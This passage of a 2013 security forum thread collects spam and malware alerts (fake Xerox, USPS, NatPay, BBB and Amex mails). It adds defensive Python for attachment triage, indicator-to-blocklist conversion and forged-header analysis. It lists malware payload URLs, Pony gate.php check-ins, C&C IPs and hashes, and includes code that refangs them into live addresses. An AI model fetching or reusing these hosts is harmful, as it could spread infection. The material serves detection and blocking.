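EXEC_EXT = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "vbs", "jar"}
DECOY_EXT = {"jpeg", "jpg", "png", "gif", "pdf", "doc", "docx", "xls", "xlsx", "txt"}
# MMDDYYYY with optional '-' or '_' separators, not embedded in a longer digit run
DATE_RE = re.compile(r"(?<!\d)(\d{2})[-_]?(\d{2})[-_]?(\d{4})(?!\d)")


def split_name(name):
    """Return (stem, [extensions]) for the final path component, lower-cased."""
    base = name.lower().replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.split(".")
    return parts[0], parts[1:]


def embedded_date(name):
    """First plausible MMDDYYYY date found in the name, as an ISO string, else None."""
    for mm, dd, yyyy in DATE_RE.findall(name):
        try:
            return date(int(yyyy), int(mm), int(dd)).isoformat()
        except ValueError:  # e.g. 10968697 -> month 10, day 96: not a date
            continue
    return None


def triage(name, sent_date=None, password_in_body=False):
    """Return the list of reasons this attachment name looks suspicious.

    sent_date: ISO date (YYYY-MM-DD) the mail was sent, if known.
    password_in_body: True when the mail body itself carries the archive password.
    """
    reasons = []
    stem, exts = split_name(name)
    if exts and exts[-1] in EXEC_EXT:
        reasons.append("executable extension: ." + exts[-1])
        if any(e in DECOY_EXT for e in exts[:-1]):
            reasons.append("double extension: decoy type before the executable")
    found = embedded_date(name)
    if found is not None:
        reasons.append("date encoded in filename: " + found)
        if sent_date is not None and found == sent_date:
            reasons.append("embedded date equals send date: per-run rebuilt sample")
    if password_in_body and exts and exts[-1] == "zip":
        reasons.append("password-protected archive with the password in the same mail")
    return reasons


def is_suspicious(name, **kw):
    return bool(triage(name, **kw))


if __name__ == "__main__":
    # Names taken from the posts above; the dates are the ones given in those posts.
    samples = [
        ("IMG 9857648740.JPEG.exe", None, False),
        ("SecureMessage_IZCO4O4VUHV83W1.zip", "2013-06-03", True),
        ("SecureMessage_06032013.exe", "2013-06-03", False),
        ("Xerox_Scan_06-04-2013-466.zip", "2013-06-04", False),
        ("USPS_Label_06062013.exe", "2013-06-06", False),
        ("quarterly_report.pdf", None, False),
    ]
    for name, sent, pw in samples:
        print(name, "->", triage(name, sent_date=sent, password_in_body=pw) or "clean")
```

The date check is deliberately tolerant of separators so that both `SecureMessage_06032013.exe` and `Xerox_Scan_06-04-2013-466.zip` are caught; comparing the embedded date with the send date is what distinguishes a per-run rebuilt sample from an ordinary dated document.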
AplusWebMaster
2013-06-05, 17:08
FYI...
Fake Xerox WorkCentre Attachment Spam
- http://threattrack.tumblr.com/post/52218547886/xerox-workcentre-attachment-spam
June 5, 2013 - "Subjects Seen:
Scanned Image from a Xerox WorkCentre
Typical e-mail details:
Reply to: Xerox.WorkCentre @[removed]
Device Name: Not Set
Device Model: XEROX-2178N
Location: Not Set
File Format: PDF (Medium)
File Name: Xerox_Scan_06-04-2013-466.zip
Resolution: 200dpi x 200dpi
Attached file is scanned image in PDF format.
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
4renttulsa .com/ponyb/gate.php
4rentunitedstates .com/ponyb/gate.php
newsouthdental .com/jENnMd2X.exe
leclosdelentaille .fr/2Zxq1hZ.exe
forexwinnersacademy .com/fmy.exe
Malicious File Name and MD5:
Xerox_Scan_06-04-2013-[removed].zip (e45db46d63330f20ef8c381f6c0d8f1a)
Xerox_Scan_06-04-2013-[removed].exe (7e4b3aca9a2a86022d50110d5d9498e2)
fmy.exe (c3c103ebb3ce065b8b62b08fba40483f)
ThreatAnalyzer Report: http://db.tt/yJoSwFM8 [PDF]
199.168.184.198, 82.165.79.64, 69.163.187.171, 216.172.167.17
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/31bd7cd2c1203ff2dc8b34df36ca50a6/tumblr_inline_mnx8zd58Hw1qz4rgp.png
___
Don't like clicking when you won't know where you're going?
- http://urlxray.com/
Find out where shortened URLs lead to without clicking on them
Enter any shortened URL...
___
More Champions Club Community SPAM
- http://blog.dynamoo.com/2013/06/more-champions-club-community-spam.html
5 June 2013 - "... the originating IP is 217.174.248.194 [web1-opp2.champions-bounce .co.uk] (Fasthosts, UK). Spamvertised domains are champions.onlineprintproofing .co.uk also on 217.174.248.194 and championsclubcommunity .com on 109.203.113.124 (Eukhost, UK). Give these spammers a wide berth..."
- http://blog.dynamoo.com/2013/03/champions-club-community.html
___
Backdoor Wipes MBR, Locks Screen
- http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/
June 5, 2013 - "German users are at risk of having their systems rendered unusable by a malware that we’re seeing being sent via spam messages. This particular malware, on top of its ability to remotely control an affected system, is able to wipe out the Master Boot Record – a routine that had previously caused a great crisis in South Korea. We recently uncovered this noteworthy backdoor as an attached file in certain spam variants. The spam sample we found is in German and forces recipients to pay for a certain debt, the details of which are contained in the attachment. Those who open the attachment are actually tricked into executing the malware, in this instance, a backdoor.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/06/backdoor-attached-file.jpg
Like any backdoor, BKDR_MATSNU.MCB performs certain malicious commands, which include gathering machine-related information and sending it to its command-and-control (C&C) server. However, the backdoor’s most noteworthy feature is its capability to wipe the Master Boot Record (MBR). The wiping of the MBR was recently used in the high-profile (but different) attack against certain South Korean institutions. What makes this routine problematic is that once done, infected systems won’t reboot normally and will leave users with unusable machines. Another command is the backdoor’s capability to lock and unlock a screen. This locking of screen is definitely a direct copy from ransomware’s playbook, in which the system remains completely or partially inaccessible unless the victim pays for the “ransom”. Ransomware is a malware that locks an infected system’s screen and displays a message, which instructs users to pay for a “ransom” thru certain payment methods... During our testing, BKDR_MATSNU.MCB readily performed the MBR wiping routine. The remote malicious user (via server) only needs to communicate this command to the backdoor and it can execute this routine immediately. However, this is not the case with the screen locking. BKDR_MATSNU.MCB is likely to download a different module onto the system, which will then lock the screen. As to what routines will be first executed or not is dependent on the remote malicious user. Attackers may opt to lock the screen first then initiate the MBR overwriting or just initiate any of the two. Another possible scenario is that another version of BKDR_MATSNU is integrated with the screen blocking routine, which will make the screen locking command easier to execute... For better protection, users should always be cautious about the email they receive and must not readily open any attachments. If your system is already infected, it is a safer bet to not pay for the “ransom”, as paying does not guarantee anything..."
:mad: :fear:
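The ThreatTrack and Dynamoo quotes in this thread publish their indicators defanged (a space before `.`, `:` and `/`, `hxxp ://` for the scheme, a `[donotclick]` prefix), and several posts end with a blocklist that mixes bare IPs and domains. The following is an added example, not code from Dynamoo, ThreatTrack or the forum poster, that reverses the defanging, splits each indicator into host, port and path, and emits a hosts-file list for the domains plus a separate firewall list for the IPs (a hosts file cannot block a bare IP). The sample indicator lines are copied from the posts above; the `[.]` convention is an assumed extra style not used on this page.

```python
"""Normalise the defanged indicators quoted in this thread into a blocklist.

Added example, not code from Dynamoo, ThreatTrack or the forum poster.
The posts above defang URLs by inserting a space before '.', ':' and '/',
writing 'hxxp ://' for the scheme and prefixing '[donotclick]'. This script
reverses that, splits each indicator into host / port / path, separates IPs
from domains (a hosts file cannot block a bare IP) and groups hosts that share
the same check-in path (e.g. the /ponyb/gate.php Pony gates). The sample lines
are copied from the posts above; the '[.]' style is an assumed extra convention.
"""
import ipaddress
import re
from urllib.parse import urlsplit

HOST_RE = re.compile(r"^[a-z0-9.-]+$")

# Constructed list: indicators copied from the ThreatTrack and Dynamoo quotes above.
SAMPLE_INDICATORS = [
    "116.122.158.195 :8080/ponyb/gate.php",
    "4renttulsa .com/ponyb/gate.php",
    "4rentunitedstates .com/ponyb/gate.php",
    "newsouthdental .com/jENnMd2X.exe",
    "hxxp ://85.143.166.158 /fexco/com/index.php",
    "190.147.81.28 /yqRSQ.exe",
    "[donotclick]usforclosedhomes .net/news/walls_autumns-serial.php",
    "amapi .com .br/bbb.html",
    "michaelscigars .net/ponyb/gate.php",
]


def refang(text):
    """Undo the defanging conventions used in the quoted posts."""
    s = text.strip()
    s = re.sub(r"^\[donotclick\]\s*", "", s, flags=re.I)
    s = re.sub(r"^hxxp(s?)\s*:\s*//", r"http\1://", s, flags=re.I)
    s = s.replace("[.]", ".").replace("(.)", ".")   # assumption: other common styles
    s = re.sub(r"\s+(?=[.:/])", "", s)                # "a .b :80 /c" -> "a.b:80/c"
    return s


def parse_indicator(text):
    """Split one indicator into host/kind/port/path; None if it is not a URL-like line."""
    url = refang(text)
    if "://" not in url:
        url = "http://" + url
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port
    except ValueError:
        return None
    if not host or not HOST_RE.match(host):
        return None
    try:
        ipaddress.ip_address(host)
        kind = "ip"
    except ValueError:
        kind = "domain"
    return {"host": host, "kind": kind, "port": port or 80, "path": parts.path or "/"}


def build_blocklist(lines):
    """Map host -> {'kind', 'paths'} across all parseable indicator lines."""
    hosts = {}
    for line in lines:
        ind = parse_indicator(line)
        if ind is None:
            continue
        entry = hosts.setdefault(ind["host"], {"kind": ind["kind"], "paths": set()})
        entry["paths"].add(ind["path"])
    return hosts


def hosts_sharing_path(hosts, path):
    """Hosts that serve the same check-in path, e.g. every Pony gate in the set."""
    return sorted(h for h, e in hosts.items() if path in e["paths"])


def render(hosts):
    """Hosts-file lines for domains, plus a separate firewall list for bare IPs."""
    domains = sorted(h for h, e in hosts.items() if e["kind"] == "domain")
    ips = sorted(h for h, e in hosts.items() if e["kind"] == "ip")
    hosts_file = ["0.0.0.0 " + d for d in domains]
    return hosts_file, ips


if __name__ == "__main__":
    table = build_blocklist(SAMPLE_INDICATORS)
    hosts_file, ips = render(table)
    print("\n".join(hosts_file))
    print("# block at the firewall:", ", ".join(ips))
    print("# pony gates:", ", ".join(hosts_sharing_path(table, "/ponyb/gate.php")))
```

Grouping by path is the useful part for detection: the `/ponyb/gate.php` check-in recurs across several of the posts above, so a proxy rule on that path catches hosts that were not in any published list.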
AplusWebMaster
2013-06-06, 18:57
FYI...
Fake Innex, Inc SPAM
- http://blog.dynamoo.com/2013/06/innex-inc-fake-spam.html
6 June 2013 - "Innex, Inc is a real company. This spam email message is -not- from Innex, Inc.
From: PURCHASING DEPARTMENT [fdmelo @fucsalud .edu.co]
To:
Reply-To: pinky .yu@chanqtjer .com.tw
Date: 6 June 2013 08:55
Subject: Innex, Inc.
Sir/Madam,
Our Company is interested in your product, that we saw in trading site,
Your early reply is very necessary for further detail specification immediately you receive our email.
Regards
Purchasing manager,
Mr James Vincent ...
Innex is based in California in the US, but the email appears to be from a university in Colombia and solicits replies to an email address in Taiwan. Note as well that the email is very vague about the "product" they are interested in, and the To: field is blank as the recipient list has been suppressed (i.e. it is being sent to multiple recipients). Avoid."
___
rxlogs .net: spam or Joe Job?
- http://blog.dynamoo.com/2013/06/rxlogsnet-spam-or-joe-job.html
6 June 2013 - "I've had nearly one hundred of these this morning. Is it a genuine spam run or a Joe Job**?
Date: Thu, 6 Jun 2013 09:44:18 -0700 [12:44:18 EDT]
From: Admin [whisis101 @gmail .com]
Reply-To: ec2-abuse @amazon .com
facebook
You recently requested a new password for your Facebook account. It looks like we sent you an email with a link to reset your password 4 ago.
This is a reminder that you need to complete this action by clicking this link and Confirm or Cancel your request.
If you have any other questions, please visit our Help Center.
Thanks,
The Facebook Team
Screenshot: https://lh3.ggpht.com/-ToJ6cyCDWME/UbBAFLEAhNI/AAAAAAAABP8/PODZRA25wh0/s1600/rxlogs.png
The link in the emails goes to multiple pages on rxlogs .net which as far as I can tell is -not- malware*, but is a blog about online pharmacies. But is it spam? Well, let's dig a little deeper.. Each email comes from a different IP, probably being sent by a botnet. That's pretty normal for pharma spam, but in this case there appear to be some anomalous additional headers.. The mildly munged headers from an example email are quite revealing. It appears that there are references to Amazon ECS (Amazon's cloud service) and a valid sender address of whisis101 -at- gmail.com injected into the headers, along with a load of other elements that you'd expect from botnet spam. The email has at no point hit either Gmail or Amazon, but the headers appear to have been -faked- in order to generate reports to Amazon and/or Gmail. It's worth noting that rxlogs .net is hosted on 107.20.147.122 which is an Amazon IP... I believe this is a Joe Job and not a "genuine" spam run, and rxlogs .net is simply another victim of the bad guys."
* http://urlquery.net/report.php?id=2919241
Source IP: 94.102.48.224 - Known RBN IP
** http://searchsecurity.techtarget.com/definition/Joe-job
___
Fake NatPay SPAM / usforclosedhomes .net
- http://blog.dynamoo.com/2013/06/natpay-transmission-confirmation-spam.html
6 Jun 2013 - "This fake NatPay spam leads to malware on usforclosedhomes .net.
Version 1:
Date: Thu, 6 Jun 2013 20:53:08 +0600 [10:53:08 EDT]
From: National Payment Automated Reports System [dunks @services .natpaymail .net]
Subject: Transmission Confirmation ~26306682~N25BHHL1~
Transmission Verification
Contact Us
To:
NPC Account # 26306682
Xavier Reed
Re:
NPC Account # 26306682
D & - D5
Thursday, July 04, 2013, Independence Day is a Federal Banking Holiday. All banks are closed for this holiday, therefore NatPay will not be able to process any files on that date. If you plan on transmitting for a paydate that falls between Thursday, July 04, 2013 and Thursday, July 11, 2013 you will need to the file a day earlier.
Batch Number 408
Batch Description VENDOR PAY
Number of Dollar Entries 2
Number of Prenotes 0
Total Deposit Amount $3,848.19
Total Withdraw Amount $3,848.19
Batch Confirmation Number 50983
Date Transmitted Thursday, June 06, 2013 ...
---
Version 2:
Date: Thu, 6 Jun 2013 09:59:06 -0500
From: National Payment Automated Reports System [lemuel @emalsrv.natpaymail .com]
Subject: Transmission Confirmation ~10968697~607MPYRC~
Transmission Verification
Contact Us
To: NPC Account # 10968697
Benjamin Turner
Re: NPC Account # 10968697
D & - MN
Thursday, July 04, 2013, Independence Day is a Federal Banking Holiday. All banks are closed for this holiday, therefore NatPay will not be able to process any files on that date. If you plan on transmitting for a paydate that falls between Thursday, July 04, 2013 and Thursday, July 11, 2013 you will need to the file a day earlier.
Batch Number 219
Batch Description VENDOR PAY
Number of Dollar Entries 2
Number of Prenotes 0
Total Deposit Amount $2,549.12
Total Withdraw Amount $2,549.12
Batch Confirmation Number 24035 ...
The malicious payload is on [donotclick]usforclosedhomes .net/news/walls_autumns-serial.php (report here*) hosted on the following IPs:
41.89.6.179 (Kenya Education Network, Kenya)
46.18.160.86 (Saudi Electronic Info Exchange Company (Tabadul) JSC, Saudi Arabia)
93.89.235.13 (FBS Bilisim Cozumleri, Cyprus)
112.170.169.56 (Korea Telecom, South Korea)
The cluster of IPs and domains this belongs to identifies it as part of the Amerika spam run.
Blocklist:
41.89.6.179
46.18.160.86
93.89.235.13
112.170.169.56 ..."
* http://urlquery.net/report.php?id=2926577
___
USPS Package Pickup Spam
- http://threattrack.tumblr.com/post/52314898634/usps-package-pickup-spam
June 6, 2013 - "Subjects Seen:
USPS - Your package is available for pickup ( Parcel [removed])
Typical e-mail details:
We attempted to deliver your item at 6 Jun 2013.
Courier service could not make the delivery of your parcel.
Status Deny / Invalid ZIP Code.
If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.
Label/Receipt Number: [removed]
Expected Delivery Date: Jun 6, 2013
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office...
Malicious URLs
michaelscigars .net/ponyb/gate.php
montverdestore .com/ponyb/gate.php
errezeta .biz/ToSN79T.exe
190.147.81.28 /yqRSQ.exe
207.204.5.170 /PXVYGJx.exe
archeting .it/86zP.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/034a2b278c131b49522ab34a745f2670/tumblr_inline_mnziitVIUE1qz4rgp.png
___
Global $200M credit card hacking ring busted
- http://www.reuters.com/article/2013/06/05/us-cybercrime-hacking-arrests-idUSBRE95419G20130605
Jun 5, 2013 - "Eleven people in the United States, the UK and Vietnam have been arrested and accused of running a $200 million worldwide credit card fraud ring, U.S. and UK law enforcement officials said... Federal prosecutors in New Jersey said they had filed charges against a 23-year-old man from Vietnam... authorities in Vietnam had arrested Duy Hai Truong on May 29 in an effort to break up a ring he is accused of running with co-conspirators, who were not named in the statement... The arrests come as law enforcement officials around the world are cracking down on Internet-related heists. Two weeks ago, authorities raided Liberty Reserve, a Costa Rica-based company that provided a virtual currency system used frequently by criminals to move money around the world without using the traditional banking system. Earlier last month, authorities arrested seven people involved in a $45 million heist in which hackers removed limits on prepaid debit cards and used ATM withdrawals to drain cash from two Middle Eastern banks... the charges were filed in New Jersey's federal court because some of the victims of the scheme are residents of the state. Prosecutors claim Truong and accomplices stole information related to more than a million credit cards and resold it to criminal customers... According to the complaint, Truong hacked into websites that sold goods and services over the Internet and collected personal credit card information from the sites' customers. "The victims' credit cards incurred, cumulatively, more than $200 million in fraudulent charges," the complaint said..."
- http://www.soca.gov.uk/news/552-eleven-arrests-as-global-investigation-dismantles-criminal-web-forum
:fear::fear: :sad:
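The rxlogs .net post above describes a Joe Job: Gmail and Amazon references injected into the headers of botnet spam so that abuse reports land on the wrong party, even though the mail never transited either. The following is an added example, not code from Dynamoo or the forum poster, of how a mail administrator can separate the `Received:` hops written by their own relays from the hops the sender supplied, recover the real connecting IP at that boundary, and flag sender domains that only appear in the untrusted part of the chain. The header block is constructed for the demo (the real headers from the post are not reproduced there); `example-victim.invalid` is the assumed receiving domain and the IPs are documentation ranges.

```python
"""Received-chain check for the forged-header 'Joe Job' pattern described above.

Added example, not code from Dynamoo or the forum poster. Received: headers
are prepended by each relay, so the top entries were written by our own
servers and can be trusted; anything below the first hop that was NOT
received 'by' one of our hosts was supplied by the sender and may be forged.
The script finds the real connecting IP at that boundary and flags sender
domains (From:, Reply-To:) that only ever appear in the untrusted part of the
chain, the trick used to steer abuse reports at Gmail and Amazon.
The header block below is constructed for the demo: example-victim.invalid is
our assumed domain and the IPs are documentation ranges.
"""
import re

# Constructed sample: our two relays on top, then a forged hop claiming Gmail/EC2.
SAMPLE_HEADERS = """\
Received: from mail.example-victim.invalid (mail.example-victim.invalid [192.0.2.10])
\tby mx.example-victim.invalid (Postfix) with ESMTP id 1A2B3C
\tfor <user@example-victim.invalid>; Thu, 6 Jun 2013 09:44:20 -0700
Received: from [198.51.100.77] (unknown [198.51.100.77])
\tby mail.example-victim.invalid (Postfix) with ESMTP id 4D5E6F;
\tThu, 6 Jun 2013 09:44:19 -0700
Received: from ec2-abuse.amazonaws.example ([203.0.113.5])
\tby gmail.com with SMTP id 7G8H9I; Thu, 6 Jun 2013 09:44:18 -0700
From: Admin <someone@gmail.com>
Reply-To: ec2-abuse@amazon.com
Subject: Your password reset request

(body)
"""

RECEIVED_RE = re.compile(r"\bfrom\s+(?P<from>\S+).*?\bby\s+(?P<by>[^\s;,()]+)", re.S | re.I)
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
DOMAIN_RE = re.compile(r"@([A-Za-z0-9.-]+)")


def unfold_headers(raw):
    """Return [(name, value)] with folded continuation lines joined."""
    headers = []
    for line in raw.splitlines():
        if not line.strip():
            break                                   # blank line ends the header block
        if line[:1] in (" ", "\t") and headers:
            headers[-1] += " " + line.strip()
        else:
            headers.append(line.rstrip())
    out = []
    for h in headers:
        name, _, value = h.partition(":")
        out.append((name.strip().lower(), value.strip()))
    return out


def received_hops(hdrs):
    """Parse Received: values (top of message first) into from/by/ips dicts."""
    hops = []
    for name, value in hdrs:
        if name != "received":
            continue
        m = RECEIVED_RE.search(value)
        if m:
            hops.append({"from": m.group("from").strip("[]").lower(),
                         "by": m.group("by").lower(),
                         "ips": IPV4_RE.findall(value)})
    return hops


def domain_of(addr):
    m = DOMAIN_RE.search(addr)
    return m.group(1).lower() if m else ""


def analyse(raw, our_domains):
    """Split the chain at the trust boundary and report unverifiable sender claims."""
    hdrs = unfold_headers(raw)
    hops = received_hops(hdrs)
    ours = [d.lower() for d in our_domains]
    trusted = []
    for hop in hops:                                # stop at the first hop not written by us
        if any(hop["by"] == d or hop["by"].endswith("." + d) for d in ours):
            trusted.append(hop)
        else:
            break
    untrusted = hops[len(trusted):]
    connecting_ip = None
    if trusted and trusted[-1]["ips"]:
        connecting_ip = trusted[-1]["ips"][0]       # the client that really spoke to us
    from_dom = domain_of(next((v for n, v in hdrs if n == "from"), ""))
    reply_dom = domain_of(next((v for n, v in hdrs if n == "reply-to"), ""))
    findings = []
    for dom in dict.fromkeys(d for d in (from_dom, reply_dom) if d):
        seen_trusted = any(dom in h["from"] or dom in h["by"] for h in trusted)
        seen_untrusted = any(dom in h["from"] or dom in h["by"] for h in untrusted)
        if seen_untrusted and not seen_trusted:
            findings.append("%s appears only below the trust boundary: unverifiable, likely forged" % dom)
        elif not seen_trusted:
            findings.append("%s never appears in a verified hop" % dom)
    if reply_dom and reply_dom != from_dom:
        findings.append("Reply-To domain %s differs from From domain %s" % (reply_dom, from_dom))
    return {"connecting_ip": connecting_ip, "trusted_hops": trusted,
            "untrusted_hops": untrusted, "findings": findings}


if __name__ == "__main__":
    report = analyse(SAMPLE_HEADERS, ["example-victim.invalid"])
    print("connecting IP:", report["connecting_ip"])
    for f in report["findings"]:
        print("-", f)
```

The practical consequence matches the post: an abuse report should go to the owner of the connecting IP found at the trust boundary (here 198.51.100.77), not to whichever provider the sender chose to name in the lower, unverifiable hops.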
AplusWebMaster
2013-06-07, 15:35
FYI...
Malware sites to block 7/6/13
- http://blog.dynamoo.com/2013/06/malware-sites-to-block-7613.html
7 June 2013 - "Two IPs that look related, the first is 37.235.48.185 (Edis, Poland or Austria) which host some domains that are also found here** (158.255.212.96 and 158.255.212.97, also Edis) that seem to be used in injection attacks. I can identify the following domains linked to 37.235.48.185:
faggyppvers5 .info
finger2 .climaoluhip.org
linkstoads .net
node1.hostingstatics .org
node2.hostingstatics .org
Injecting some of the same sites as the domains on the above IPs is jstoredirect .net which is currently offline but was hosted on 149.154.152.18 which is also Edis (can you see the pattern yet?) so I would assume that they are linked. In the few days that jstoredirect .net was online it managed to infect over 1500 sites*.
Aggregate blocklist:
98.126.9.34
114.142.147.51
158.255.212.96
158.255.212.97
nethostingdb .com
netstoragehost .com
connecthostad .net
climaoluhip .org
hostingstatics .org
systemnetworkscripts .org
numstatus .com
linkstoads .net
faggyppvers5 .info
jstoredirect .net ..."
* http://www.google.com/safebrowsing/diagnostic?site=jstoredirect.net
** http://blog.dynamoo.com/2013/05/something-bit-evil-on-15825521296-and.html
___
Fake USPS SPAM / USPS_Label_861337597092.zip
- http://blog.dynamoo.com/2013/06/usps-spam-uspslabel861337597092zip.html
6 June 2013 - "This fake USPS spam contains a malicious attachment:
Date: Thu, 6 Jun 2013 10:43:56 -0500 [11:43:56 EDT]
From: USPS Express Services [service-notification @usps .com]
Subject: USPS - Your package is available for pickup ( Parcel 861337597092 )
Postal Notification,
We attempted to deliver your item at 6 Jun 2013.
Courier service could not make the delivery of your parcel.
Status Deny / Invalid ZIP Code.
If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.
Label/Receipt Number: 861337597092
Expected Delivery Date: Jun 6, 2013
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Thank you,
© 2013 Copyright© 2013 USPS. All Rights Reserved.
*** This is an automatically generated email, please do not reply ...
There is an attachment called USPS_Label_861337597092.zip which in turn contains a malicious executable file USPS_Label_06062013.exe (note the date is encoded into the filename). VirusTotal results for this are 18/47*. The Comodo CAMAS report** shows an attempt to download more components from michaelscigarbar .net on 184.95.37.109 (Jolly Works Hosting, Philippines.. rented from Secured Servers in the US). URLquery shows a very large amount of malware activity on that IP, mostly apparently running on legitimate -hacked- domains. You should probably treat all of the following domains as hostile:
alliancelittleaviators .com
apparelacademy .com
apparelacademy .net
brokerforcolorado .com
carlaellisproperties .com
dragoncigars .net
heavenlycigars .net
libertychristianstore .com
michaelscigarbar .com
michaelscigarbar .net
michaelscigars .net
montverdestore .com
montverdestore .net
montverdestore .org ..."
* https://www.virustotal.com/en/file/876e82910a2da4ccc4fc861b35f6b3bea9b09219657a2da3cfb2b4cf553ab695/analysis/1370549956/
File name: USPS_Label_06062013.exe
Detection ratio: 18/47
Analysis date: 2013-06-06
** http://camas.comodo.com/cgi-bin/submit?file=876e82910a2da4ccc4fc861b35f6b3bea9b09219657a2da3cfb2b4cf553ab695
*** http://urlquery.net/search.php?q=184.95.37.109&type=string&start=2013-05-22&end=2013-06-06&max=50
___
Better Business Bureau Compliant Spam
- http://threattrack.tumblr.com/post/52376899345/better-business-bureau-compliant-spam
7 June 2013 - "Subjects Seen:
BBB Appeal [removed]
Typical e-mail details:
The Better Business Bureau has been booked the above mentioned grievance from one of your users in respect to their dealings with you. The detailed description of the consumer’s trouble are available for review at a link below. Please give attention to this matter and notify us about your sight as soon as possible.
We graciously ask you to overview the CLAIM REPORT to answer on this plaint.
We awaits to your prompt answer.
WBR
Ryan Myers
Dispute Advisor
Malicious URLs
amapi .com .br/bbb.html
pnpnews .net/news/readers-sections.php?hvv=rvjzzloo&jnjpe=thpe
pnpnews .net/news/readers-sections.php?yf=1i:1f:32:33:2v&re=1n:2w:1n:1g:30:1f:1o:1n:1i:2v&u=1f&br=b&sd=c&jopa=5698723
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ce72a2134c909b412e923b4b30385da6/tumblr_inline_mo0xyvrpWf1qz4rgp.png
- http://blog.dynamoo.com/2013/06/bbb-spam-pnpnewsnet.html
7 June 2013 - "This fake BBB spam leads to malware on pnpnews .net:
From: Better Business Bureau [mailto:standoffzwk68 @clients.bbb .com]
Sent: 07 June 2013 15:08
Subject: BBB information regarding your customer's pretension No. 00167486
Better Business Bureau ©
Start With Trust ©
Fri, 7 Jun 2013
RE: Complaint No. 00167486
[redacted]
The Better Business Bureau has been entered the above said grievance from one of your users in regard to their business relations with you. The information about the consumer's trouble are available visiting a link below. Please pay attention to this matter and notify us about your sight as soon as possible.
We kindly ask you to overview the CLAIM LETTER REPORT to meet on this claim.
We awaits to your prompt answer.
Faithfully yours
Jonathan Edwards
Dispute Advisor
Better Business Bureau ...
Screenshot: https://lh3.ggpht.com/-RY4L1o2A9_w/UbHwqENyOxI/AAAAAAAABQw/IgMGesJmdiQ/s400/bbb.png
The link in the email goes through a legitimate hacked site and then to a payload at [donotclick]pnpnews .net/news/readers-sections.php (report here*) hosted on:
46.18.160.86 - Saudi Electronic Info Exchange Company (Tabadul) JSC
93.89.235.13 - FBS Bilisim Cozumleri, Cyprus
178.16.216.66 - Gabrielson Invest AB, Sweden
186.215.126.52 - Global Village Telecom, Brazil
190.93.23.10 - Greendot, Trinidad and Tobago
Blocklist:
46.18.160.86
93.89.235.13
178.16.216.66
186.215.126.52
190.93.23.10 ..."
* http://urlquery.net/report.php?id=2944992
... Detected BlackHole v2.0 exploit kit URL pattern ...
___
Fake American Express PAYVE Remit Spam
- http://threattrack.tumblr.com/post/52383728966/american-express-payve-remit-spam
June 7, 2013 - "Subjects Seen:
PAYVE - Remit file
Typical e-mail details:
A payment(s) to your company has been processed through the American Express Payment Network.
The remittance details for the payment(s) are attached ([removed].zip).
- The remittance file contains invoice information passed by your buyer. Please contact your buyer for additional information not available in the file.
- The funds associated with this payment will be deposited into your bank account according to the terms of your American Express merchant agreement and may be combined with other American Express deposits. For additional information about Deposits, Fees, or your American Express merchant agreement:
Contact American Express Merchant Services at 1-800-528-0933 Monday to Friday, 8:00 AM to 8:00 PM ET.
- You can also view PAYVE payment and invoice level details using My Merchant Account/Online Merchant Services. If you are not enrolled in My Merchant Account/OMS, you can do so at americanexpress .com/mymerchantaccount or call us at 1-866-220-7374, Monday - Friday between 9:00 AM-7:30 PM ET, and we’ll be glad to help you.
For quick and easy enrollment, please have your American Express Merchant Number, bank account ABA (routing number) and DDA (account number) on hand.
This customer service e-mail was sent to you by American Express. You may receive customer service e-mails even if you have unsubscribed from marketing e-mails from American Express...
Malicious URLs
storeyourbox .net/ponyb/gate.php
storeyourthings .net/ponyb/gate.php
drjoycethomasderm .com/ponyb/gate.php
errezeta .biz/ToSN79T.exe
190.147.81.28 /yqRSQ.exe
207.204.5.170 /PXVYGJx.exe
archeting .it/86zP.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/567fce768b7d6ce4026f49571595ee72/tumblr_inline_mo14hjPc6a1qz4rgp.png
- http://blog.dynamoo.com/2013/06/payve-remit-file-spam.html
7 June 2013 - "This fake American Express Payment Network spam has a malicious attachment.
Date: Fri, 7 Jun 2013 20:41:25 +0600 [10:41:25 EDT]
From: "PAYVESUPPORT @AEXP .COM" [PAYVESUPPORT @AEXP .COM]
Subject: PAYVE - Remit file ...
Attached to the email is an archive file called CD0607213.389710762910.zip which in turn contains an executable named CD06072013.239871839.exe (note that the date is included in the filename). Virustotal reports that just 8/46* anti-virus scanners detect it.
The Comodo CAMAS report*** gives some details about the malware, including the following checksums:
MD5 fd18576bd4cf1baa8178ff4a2bef0849
SHA1 8b8ba943393e52a3972c11603c3f1aa1fc053788
SHA256 f31ca8a9d429e98160183267eea67dd3a6e592757e045b2c35bb33d5e27d6875
The malware attempts to download further components from storeyourbox .com on 97.107.137.239 (Linode, US) which looks like a legitimate server that has been -badly- compromised**. The following domains appear to be on the server, I would advise that they are all dangerous at the moment:
drjoycethomasderm .com
goodvaluemove .com
jacksonmoving .com
jacksonmoving .net
napervillie-movers .com
reebie .net
storageandmoving .net
storeyourbox .com
storeyourbox .net
storeyourthings .net "
* https://www.virustotal.com/en/file/f31ca8a9d429e98160183267eea67dd3a6e592757e045b2c35bb33d5e27d6875/analysis/1370627576/
File name: CD06072013.239871839.exe
Detection ratio: 8/46
Analysis date: 2013-06-07
** https://www.virustotal.com/en/ip-address/97.107.137.239/information/
*** http://camas.comodo.com/cgi-bin/submit?file=f31ca8a9d429e98160183267eea67dd3a6e592757e045b2c35bb33d5e27d6875
AplusWebMaster
2013-06-10, 22:52
FYI...
Fake Wells Fargo - attachment Spam
- http://threattrack.tumblr.com/post/52635380368/wells-fargo-important-document-attachment-spam
June 10, 2013 - "Subjects Seen:
